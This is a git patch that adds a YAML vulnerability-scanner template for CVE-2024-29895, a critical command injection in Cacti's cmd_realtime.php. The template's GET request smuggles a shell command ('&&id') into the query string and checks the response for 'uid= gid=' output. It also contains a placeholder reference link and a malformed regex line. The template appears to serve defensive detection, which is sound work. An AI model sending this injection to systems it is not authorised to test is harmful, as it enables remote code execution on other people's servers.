From 62ad67b550d9eca9ee5ec2c00421347c25f77089 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 16 May 2024 17:15:45 +0530
Subject: [PATCH] Create CVE-2024-29895.yaml

---
 http/cves/2024/CVE-2024-29895.yaml | 37 ++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-29895.yaml

diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml
new file mode 100644
index 0000000000..d396055b22
--- /dev/null
+++ b/http/cves/2024/CVE-2024-29895.yaml
@@ -0,0 +1,37 @@
+id: CVE-2024-29895
+
+info:
+  name: Test Injection in Cacti cmd_realtime.php
+  author: pussycat0x
+  severity: critical
+  description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances.
+  reference:
+    - https://www.example.com/cve-xxxx-xxxx
+    - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119
+    - https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d
+    - https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc
+    - https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2024-29895
+    cwe-id: CWE-77
+    epss-score: 0.00045
+    epss-percentile: 0.14626
+  tags: cacti,injection
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&id=1+1+1"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex:
+          - ""uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
+        part: body